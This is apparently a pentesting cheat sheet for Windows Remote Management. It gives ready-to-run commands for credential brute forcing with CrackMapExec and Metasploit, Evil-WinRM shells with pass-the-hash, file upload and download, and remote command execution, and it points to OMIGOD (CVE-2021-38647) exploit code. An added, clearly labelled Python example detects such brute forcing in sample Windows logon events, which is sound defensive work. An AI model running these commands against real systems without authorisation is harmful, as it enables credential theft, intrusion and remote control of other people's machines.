# WinRM (Windows Remote Management) Pentesting

### Enumeration

#### Brute Force Credentials

```sh
# CrackMapExec
poetry run crackmapexec winrm <target-ip> -d DomainName -u usernames.txt -p passwords.txt

# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login
```
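The defender's view of the credential guessing shown above, as an added example that is not part of the original page, CrackMapExec or Metasploit: it walks constructed (not real) Windows Security-log records, flags any source that fails several network logons (Event 4625, logon type 3, which is how WinRM authentication is recorded) inside a short window, and reports the account that then logged on successfully (Event 4624) from the same source.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real log data): timestamp, event ID, logon type,
# target account, source address. 4625 = failed logon, 4624 = successful logon.
# Logon type 3 (network) is how WinRM authentication over 5985/5986 is recorded.
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:01", 4625, 3, "alice", "10.0.0.50"),
    ("2024-01-10T09:00:02", 4625, 3, "bob", "10.0.0.50"),
    ("2024-01-10T09:00:03", 4625, 3, "carol", "10.0.0.50"),
    ("2024-01-10T09:00:04", 4625, 3, "dave", "10.0.0.50"),
    ("2024-01-10T09:00:05", 4625, 3, "erin", "10.0.0.50"),
    ("2024-01-10T09:00:06", 4624, 3, "erin", "10.0.0.50"),  # spray found a valid password
    ("2024-01-10T09:05:00", 4625, 3, "alice", "10.0.0.77"),  # single typo: no alert
    ("2024-01-10T09:06:00", 4624, 2, "frank", "-"),          # console logon: ignored
]

def detect_winrm_bruteforce(events, threshold=5, window=timedelta(minutes=2)):
    """Flag sources with >= `threshold` failed network logons inside `window`.
    Returns {source: {"failures", "accounts", "success"}}; `success` is the first
    account that then logged on from that source (the credential the spray found)."""
    by_src = defaultdict(list)
    for ts, event_id, logon_type, account, src in events:
        if logon_type != 3:  # only network logons are relevant to WinRM
            continue
        by_src[src].append((datetime.fromisoformat(ts), event_id, account))
    alerts = {}
    for src, recs in by_src.items():
        recs.sort()
        fails = [r for r in recs if r[1] == 4625]
        # Slide over the failures; stop at the first burst that fits in the window.
        for i in range(len(fails) - threshold + 1):
            burst = fails[i : i + threshold]
            if burst[-1][0] - burst[0][0] <= window:
                burst_end = burst[-1][0]
                success = next(
                    (a for t, e, a in recs if e == 4624 and t >= burst_end), None
                )
                alerts[src] = {
                    "failures": len(fails),
                    "accounts": sorted({a for _, _, a in burst}),
                    "success": success,
                }
                break
    return alerts

if __name__ == "__main__":
    for src, info in detect_winrm_bruteforce(SAMPLE_EVENTS).items():
        print(f"ALERT {src}: {info}")
```

A success immediately after a burst of failures against different accounts is the signal worth paging on; the failures alone are often just a misconfigured script.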


### Evil-WinRM

[**Evil-WinRM**](https://github.com/Hackplayers/evil-winrm) is a Windows Remote Management shell for pentesting.\
Below is a list of commands for each situation.

#### Connect

```powershell
evil-winrm -i <target-ip> -u username -p password
# -P: Specify port
evil-winrm -i <target-ip> -P 5986 -u username -p password

# Pass the Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc

# Local path to PowerShell scripts (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts

# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S
```

If you have a private key and a public key, you can use them for authentication.

```sh
# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key
```

#### Commands

After connecting, a number of useful built-in commands are available.\
Note that **absolute paths are required for uploading and downloading.**

```powershell
# Upload a local file to the Windows machine
PS> upload ./example.bat c:\Users\Administrator\Desktop\exploit.bat
# Download a file to the local machine
PS> download c:\Users\Administrator\Desktop\example.txt ./example.txt

# List all services
PS> services
```


### CrackMapExec

[**CrackMapExec**](https://github.com/byt3bl33d3r/CrackMapExec) is a Swiss army knife for pentesting networks.\
The official docs recommend running it via **Poetry**, a Python package manager.

First, change to the directory where CrackMapExec is installed and run **poetry install**.

```sh
cd crackmapexec
poetry install
```

Then execute with **poetry run**.

```sh
# Login and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -x 'whoami'
# Login and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -X '$PSVersionTable'

# Pass the Hash and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -x 'whoami'
# Pass the Hash and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -X '$PSVersionTable'
```


### OMIGOD (CVE-2021-38647)

Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE), tracked as CVE-2021-38647.

Several PoCs are available, for instance:

* <https://github.com/AlteredSecurity/CVE-2021-38647>
* <https://github.com/horizon3ai/CVE-2021-38647>

### References

* <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>

